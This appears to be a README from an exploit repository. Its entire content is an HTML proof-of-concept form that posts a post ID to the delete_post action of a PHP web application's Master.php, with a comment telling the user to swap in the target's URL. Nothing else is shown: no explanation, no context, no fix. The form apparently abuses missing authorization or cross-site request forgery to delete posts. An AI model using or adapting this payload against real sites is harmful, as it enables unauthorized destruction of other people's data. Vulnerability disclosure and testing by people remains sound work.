README.md
Rendering markdown...
<!-- Replace form action URL with the target's URL -->
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">
<input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
<button type="submit">Delete Post</button>
</form>